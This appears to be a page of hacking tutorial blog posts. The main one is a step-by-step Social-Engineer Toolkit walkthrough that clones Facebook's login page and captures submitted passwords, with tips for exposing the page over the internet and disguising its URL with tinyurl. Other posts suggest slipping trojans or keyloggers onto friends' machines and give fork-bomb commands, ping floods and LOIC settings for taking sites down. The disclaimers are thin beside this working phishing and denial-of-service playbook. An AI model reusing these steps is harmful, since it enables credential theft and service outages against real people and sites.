Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing you networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)

If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.

Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |
                 /        \ |        \  |    |
                /_______  //_______  /  |____|
                        \/         \/          
  [---]        The Social-Engineer Toolkit (SET)         [---]      
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]                 Version: 4.3.9                   [---]
  [---]              Codename: 'Turbulence'              [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]
     Welcome to the Social-Engineer Toolkit (SET). The one
      stop shop for all of your social-engineering needs.
 
      Join us on irc.freenode.net in channel #setoolkit
  The Social-Engineer Toolkit is a product of TrustedSec.
           Visit: https://www.trustedsec.com
 Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 

Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

• 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
• The 2 selects Website Attack Vectors. Not that obvious.  The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
• Then, the 3 selects Credential Harvestor.  The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you'll be seeing something like this-

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for

Back to se-toolkit

 Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.

The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works.

On the Kali Linux Machine itself

Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -

Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password

Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. Also, we would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.

I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.

POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. [Coming Soon] There you go -  http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html

Read full post »

Hack Facebook Account : Stuff You Should Know

Hack Facebook?

Okay, so you got lured into the idea of hacking a Facebook account? I won't ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read - Hack Facebook Account : Stuff You Should Know - and not - How to hack a facebook account (well actually don't leave, I have something for you later in this tutorial, something on actually hacking Facebook) .That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

Why not to think about hacking facebook

Search google images for facebook hack and you already
 see so many misleading programs. I mean
just enter user ID and they'll provide
 you with username and password.
It's surprising how many people actually expect it to work.

First, because you can't. Well, actually you can, but the high improbability of success makes it stand next toyou can't hack facebook. If you think typing 'hack facebook account' on google, clicking on the first result, and entering the target's email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack a FB account no one would be using FB to start with. There is so much on our Facebook account that we can't even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched google for hacking facebook.
impossible, so much so, that I won't be exaggerating in saying that it can't be hacked. As far as the picture on the left is concerned, its one of the many tools offered on the internet, all of which have the following in common-

1. All have very easy user interface. You just have to enter the user id, and click hack.
2. All have download links which will take you to a survey, or some annoying ads.
3. All are 100% not working.

What does 'hacking Facebook' actually mean?

What is the actual meaning of hacking Facebook. Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone's password, but hacking is so much more. Account passwords to hacking are just like coins are to the subway surfer game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don't get caught. And trust me, you can't do this. I mean you wouldn't be reading a blog on beginner level hacking on Kali Linux if you had so far with web pentesting. So, the conclusion is that hacking Facebook is a real big deal, not everyone's piece of cake (I admit even I'm nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can't be only one way to get someone's facebook password. I mean we don't want administrator access to all the Facebook databases, just a password of one of the millions of users. There must be a hole somewhere. That kid next door claims he can get Facebook password of anyone, and he's good, but not 'code a exploit for Facebook' good, no, not that good. This is where social engineering steps in.

Social Engineering

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached almost unbeatable stage. With 256 bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to latest security measures), and so is the element of cost-effectiveness and carelessness (you don't picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). But nevertheless, things are changing, but one thing remains constant. Humans. Humans in general are stupid. Not really, a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about what all Facebook is doing for their accounts security, and how easily their carelessness can ruin each and every one of Facebook's effort to protect their private information.

Humans are the weakest link in any security system

From leaving one's account logged in to not paying attention to someone who's peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it'll definitely annoy and offend people. I mean not good at computers doesn't really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can't hack Facebook and gain access to their servers, but your friends machine isn't that well guarded. A virus binded with a game he asked you to fetch in a USB drive? An average person won't think that you might have planted a trojan or a keylogger in the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware in his computer. Many people don't think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story, that you can expect the target to buy). There are many more methods. As far as the promise for something later in this tutorial about actual Facebook hacking, I have provided you with a small trailer about what you can do, in the next few tutorials we will discuss stuff in detail. The first tutorial is here.

Credential Harvester To Hack Facebook (Phishing)

I don't usually put this disclaimer, but as it was a tutorial that could potentially lead a lot of people on the wrong track (away from the quest on knowledge and towards the quest for illegal hacking and account passwords), here is a warning. Everything on this site is for educational purposes and I won't be responsible for anything you do with this information. If you do something illegal, the jail time would be yours to serve, not mine. So be careful where you are headed.

Read full post »

Denial Of Service Attack : Lesson For Life

Introduction

(This post has been sourced from a well known tutorial from Hackforums.net)
I have already written 2 posts on Denial of Service attack. The first one gives an insight to the working of Denial of service by bringing in practical examples (bus stop scenario and online multiplayer game scenario). The second one tells us about the various Denial of Service attack. I'm linking both the articles here for you to read if you want to-

Denial Of Service Attacks : Explained for Beginners and Dummies

Denial Of Service Methods : ICMP, SYN, teardrop, botnets

The thing is, while these two are pretty good reads (first one is a must read for everyone), I read something on HackForums.net which completely captured my attention. This tutorial was found in the premium tutorials section, and looked like this-

I asked coolmagicdude2 if I could post his tutorial on blog, as it would help a lot of users. He agreed. So this tutorial has not been written by me but a well known hacker from hack forums, who calls himself Druidtton of Darksunlight. I loved the tutorial and hope you'd enjoy it too. The tutorial is in first person and has many references to his personal experiences. I haven't replaced the first person to third (I to he, my to his). I have also removed all links, and replaced some.

What is "DDoS"?

Denial of Service attacks(or Distributed Denial of Service attacks[DDoS]) are a form of organized attacks with the goal of taking down a server by overloading it. Often by sending useless information(packets) to a server in massive amounts.

In-fact about a year ago I found one of my (his) websites was accidentally DoS-ing darksunlight.com(I use darksunlight as my webhost) because my PHP script made an infinite loop that sent the same information over and over and over into darksunlight's SQL databases. This one page took this EXTREMELY powerful server down twice in less than a minute. That site has since been deleted.
That story demonstrates that it does not take more than a simple "error" in your code to overload a server.

Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal crime in the US.
It is also an international offence and will be punished according to the local laws of the individual's country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.

Example Of DOS attack

Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

We will take down YOUR computer.
Step 1
Open up notepad, mousepad, or your favored equivalent.
Step 2
Type in this simple batch command
Code:
:a
start
goto a
Step 3
Save as "dossample.bat" making sure you select "All files" from the "File Type" dialog.
Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?

Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs(or Terminals for you Unix folk)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.

What information you may ask?

Anything. Your login name, your 'online' status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the 'ping' command built into most operating systems, including all windows and Linux distributions.
Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged. (He paced up really unexpectedly here. You might want to skip this part if you haven't created any local server using apache or any other program.)
Step 2
Type in the ping command
Code:
ping -t -a -l 65500 localhost
Step 3
Press enter and watch it ping the localhost over and over until[/b]
your server crashes, or you get tired of waiting for it to crash.
Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained

ping - tells the computer to ping a server
-t - It will continue to ping the server until the command is closed, or stopped.
-a - Resolves the adress to host names.
-l - Size.

By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.

If you send a server any number higher than 65,500bytes it will instantly crash. This is called "Ping of Death".
Like any other thing with the suffix "of Death" it is very rare, and hard to accomplish indeed.
In order to learn more about the Ping of Death, read my huge response to this very thread, here! (I have copied his response to the end of the tutorial)

DDoS by Reloading

Something as simple as reloading a page can take down a server if done enough times.
Step 1
Make a page that lets you submit forms. Method='GET' is better than method='POST' for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)
Step 2
Fill out the forms and submit
Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click "Continue" or "OK".(see now why GET is better?)
Step 4
Keep reloading until server is down.
Their are many add ons and tools that allow you to auto-reload a page. It is a matter of googleing for them. They are widely available and free.

I have just created a program that allows you to Auto-refresh a page using IE. If you are interested please download from:
Host: Darksunlight.com | Size: 9kb | Format: .zip ultra compressed | Platform: Windows

Use the browser extensions instead. Google for auto reload addons for your browser.

This method is very primitive as you can see, but it is probably the best way to DDoS.
In order to learn more about DDoS by reload, read my huge response to this very thread, here!
(I have copied his response to the end of the post)

Low-Orbit Ion Cannon

LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

(He has stressed the fact enough, but let me remind you again, this is a punishable offense. Use LOIC only on your localhost 127.0.0.1. Don't use it on any online server, they cops will come to get you. In contrast to all other tools on this blog, this one works on Windows.)

Download:
LOIC | Host: SourceForge
Step 1
Download and extract LOIC
Step 2
Open LOIC.exe and fill out the required information.

Instructions for filling out:
IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server's port
Method = Server's Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to "<= faster"
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.
Step 3
Click on "IMMA CHARGIN MAH LAZER"
This starts your the program.
Warning: This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.

Conclusion

Now you know what a DDoS attack is and you can work to better protect your self.

Their are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers xD

Like any web developer I hope you will use this information for the good.
Sadly i know that their are those among us that are, even now as we read this, plotting how to do harm with this information.
To those, I flip the bird.

Response to Reloading method and ping of death

Question : 

This is a really good theoretical tutorial. Some questions I have though are number 1, how do you make the ping send a packet larger than 65000? And isn't that a really old exploit that only works <=win95?

I also really have doubts about the reloading method. Is it just a theoretical thing that if a site is small enough it could work, or is there actually a practical possibility of it? Are there any examples?

Response:

Both very good questions.

1. The ping of death, or a packet larger than 65,000 is, in fact, a really old exploit that most servers and operating systems have patched. But not all.

It is still quite possible for the Ping of death to work, often with mixed results.

Some of the vulnerable operating systems are: 

Solaris(x86 version) 2.5 & 2.5.1a

MkLinux

Windows NT(mixed results, after microsoft released patch)

Linux, below version 2.0.23

Windows 95

Novell Netware 3.X.X

MacOS <= 7.X.X

And many others...

For a full list of vulnerable operating systems, and their response to a ping of death attack, visit this page. 

2. The reloading method is not only practically plausible, but it happens every day, and most often in accident.

Let me explain, go to... let's say, the front page of hackforums, and hit CTRL+S, this will save the webpage into your hard drive. It will most likely be located under your downloads folder, check the properties for that web document, and all attached files.

The size of the front page of hackforums.net, including all elements displayed(images, CSS files, separate JS file, ect...) is around 500KB.

This might not seem like much, that's much less than the average size of a picture taken with any recent digital camera, but consider this:

As I type this, there are currently around 729 members actively surfing the website. Each of them is downloading around 500KB of data from this server, simple arithmetic tells us that's a total of 364,500KB(roughly 356MB of data, or about the size of a standard definition feature length video-film) of data. 

356MB of data that was transfered from the hackforums.net server, into 729 separate connections.

Still doesn't sound like a lot, does it?

Hackforums.net gets an average of 5 page views, per visitor. That means that each of those 729 people that are online right now, will visit around 5 pages before they leave the site.

Supposing that every page in hackforums.net has a similar size to the front page, of ~500KB(in fact most pages are somewhat larger than that), and knowing that there is a total of 729 people currently online, and supposing that each of them will visit an averge of ~5 pages, then we can create a simple formula to calculate the server stress at this point in time.

X = Average size of a page(~>=500kb)

Y = Visitors online(~729 ATM)

Z = Average of ~5 pages viewed, per visitor

D = Data transfer at any given point

D = (X*Y)*Z

This gives us a total of 1,822,500KB or about 1.73GB(roughly the size of an HD 720p feature length video-film).

That's 1.73GB of data that has just been transferred from hackforums.net to 729 separate connections. 

Still doesn't sound like a lot, right? Well, this has been the total transfer for the past ~5 minutes or so. 

In reality hackforums employs many techniques to minimize data transfers, and so does your browser. Things like an indexed cache or offline stored data can minimize the number of things that have to be downloaded from the web server every time you load(or re-load) a page.

I calculated a total daily download transfer of around 1,133GB per day(roughly 285 FullHD 1080p feature length video-films) for hackforums.net, but you can be sure that it's much larger than that. 

Even then we're only accounting for data transferred as downloads.

We're not even touching the immense amount of uploads, connection request, resolves, pings, local data transfers, SQL INSERTs/UPDATEs/DELETEs, and a slew of other processes that occur every time you load a page.

Let me give you a quick example, in case my explanation wasn't enough.

On October, 25th, 2011 the popular web adventure/comic "Homestuck" released the final page of their 5th 'act' or volume.

The last page was released in the form of a, VERY LONG and VERY AWESOME, flash animation that was around 250KB in size.

(You are welcome to experience it here.)

Said flash animation was hosted on the capacious flash portal, newgrounds.com

Keep in mind that newgrounds.com is a website that experiences millions of daily visits, and they serve flash files that range from a couple KBs to >~100MBs without even breaking a sweat.

Within less than an hour of the release, both newgrounds.com AND the homepage of the homestuck webcomic had been taken down by their own fanbase. 

Everyone was so exited to finally see the last page, that they all rushed in to see the animation at once, and thus crashed both websites with ease.

Both websites kept crashing multiple times during the day, until all the fans had seen it, and had thus stopped loading and reloading that page.

So to recap, not only is DoS by page reload plausible, but it is, without a doubt, the most effective method of DDoS.

_________________________________________________

So this is all there was to the tutorial. I hoped you liked it. If you have any queries feel free to ask.

Read full post »

Denial Of Service Methods : ICMP, SYN, teardrop, botnets

Introduction to Denial Of Service

In a previous post, I had introduced you to the basic idea of a denial of service attack. We used real life examples (bus stop and online game) to depict the idea behind a DOS attack. We crashed our own Windows and Kali Linux machine (using batch and command line interface respectively). Now it's time to learn how actually DOS of service attacks work, in terms of packets and other networking terms. So here is a one by one description on four of the well known attacks.

Various methods of Denial Of Service attack

ICMP flooding (smurfing)

Before I go off explaining what the attack is, first I'll tell you about the packets.

Contents of an ICMP packet (should not bother you currently)

ICMP packets have two purposes (technically)-

• It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached
• It is also used to relay query messages

Practically, all an ICMP packet does is confirm connectivity. You send a message to an IP and see if you are connected. If not, you get an error like "Destination unreachable". Pings use the ICMP packet.

While the packet as a whole allows us to directly attack the network by flooding it with a lot of ICMP packets, the second ability listed above gives us a new advantage. We can send ICMP relay packets to a network, with a spoofed source IP (we will change our IP to that of target), and when the network will replay to our packet, it will reply to the spoofed IP, causing it to be flooded with ICMP packets. This is called indirect ICMP flooding, also known as smurfing. It is tougher to detect than a normal direct ICMP attack, and the network serves as amplifier, the larger the better, making the attack much stronger, since you have the power of many computers at your disposal, instead of just one. If the target is flooded with enough packets, it loses it ability to respond to genuine packets, resulting in a successful Denial of Service attack.

SYN flooding

The three way handshake (that didn't happen in our case)

In SYN flooding, the attacker send the target a large number of TCP/SYN packets. These packets have a source address, and the target computer replies (TCP/SYN-ACK packet) back to the source IP, trying to establish a TCP connection. In ideal condition, the target receives an acknowledgement packet back from the source, and the connection established is in a fully open state. However, the attacker uses a fake source address while sending TCP packets to the victim, and the target's reply goes to an inexistent IP, and therefore, does not generate an acknowledgement packet. The connection is never established, and the target is left with a half open connection. Eventually, a lot of half open connections are created, and the target network gets saturated to the point where it does not have resources left to respond to the genuine packets, resulting in a successful DOS attack. Also, since the connections stay open for a while, the server loses its ability to work for a good amount of time after the attack has been stopped.

Teardrop attack

First of all - In computer networking, a mangled or invalid packet is a packet — especially IP packet — that either lacks order or self-coherence, or contains code aimed to confuse or disrupt computers, firewalls, routers, or any service present on the network. (source : Wikipedia)

Now in  a teardrop attack, mangled IP packets are sent to the target. They are overlapping, over-sized, and loaded with payloads. Now various operating systems have a bug in their TCP/IP fragmentation re-assembly code. What that means, is when the OS tries to re-assemble the TCP/IP packets that it gets, a piece of code exploits a bug in the way the re-assembling process works, and the OS crashes. This bug has been fixed, and only Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack. This type of attack does not require much bandwidth on the user side, and has devastating effect for the targeted server.

Botnets

A small botnet

Now, this is not an attack is such, rather, it is a way of carrying out the attacks more effectively. When carried out against a large server, the above attacks usually prove ineffective. Your home router is nothing when compared to the HUGE servers that big websites have, and handling a single PCs DOS effect can be a piece of cake. This leads to the need of a Distributed Denial of Service attack. In a distributed denial of service, hacking groups use their numbers as strength. For example, if you have 500 friends who know how to carry out a denial of service attack, then the combined impact is much more dangerous than that of a lone PC. However, it is not always possible to have 500 hackers next door, and not all of us are part of large black hat hacking organisations. 

Try not to end up like this

This is where the botnets steps in. Now the bad guys use tools called RATs (remote administration tools) to infect and get total control over computers over the internet. The RATs are a kind of trojan, and can lie there on your PC and you'll never find out. By the use of crypting, some hackers have mastered anti-virus evasion, and these RATs can lie undetected on your PC for years. This is 100% illegal. You can easily end up in jail for this, and I recommend that you stay away from this. But, its important that you are aware of the existence of such tools, and more importantly, what the hackers can do with them. Now lets assume you made a RAT and its has infected 10,000 people. You can actually control those 10,000 computers. Now there's this website server that you don't like, and you're this badass hacker who takes down stuff he doesn't like. No, you don't have a warehouse full of networking power (servers), but you do have ten thousand computers at your disposal, and this is called a botnet. You also have 5 friends who are hackers, and have similarly sized botnets. Such immense networking power can easily take down a large website for hours, if not days. The results of flooding packets from 50,000 computers can be catastrophic. With modern day firewalls, it is almost impossible to flood servers and take them down using one single computers, so while botnets are the most unethical entities, they are also the most powerful. Now here is a suggestion, Denial of Service attacks are easy to trace back (if you are a beginner), and even if you are good, there is always someone better, and you can't hide forever. So try not to send bad packets at random websites, you won't look good in orange 

Read full post »

Denial Of Service Attacks : Explained for Beginners and Dummies

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it's just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly). 

A Live DOS on your Kali Machine

If you have Kali linux (The hackers OS- the OS of choice if you use this blog) the here's a small exercise for you. 

We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too.

Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone.

:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.

What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up.

Here's something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat

Bat here is batch file extension. Run it. Game over.

It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

PS:
As suggested in the comments, this script will crash windows much faster-

:1
bash name.bat
goto 1

If you look at the script carefully, it is quite easy to understand what it does. Everytime the script is executed, it does two things-

1. Opens another instance of the same script
2. Goes to the beginning of the script

So for every execution, the number of scripts slowing down your computer doubles up. This means that instead of linear, the load on memory and processor is now exponential (the script gets more and more dangerous with time).

Read full post »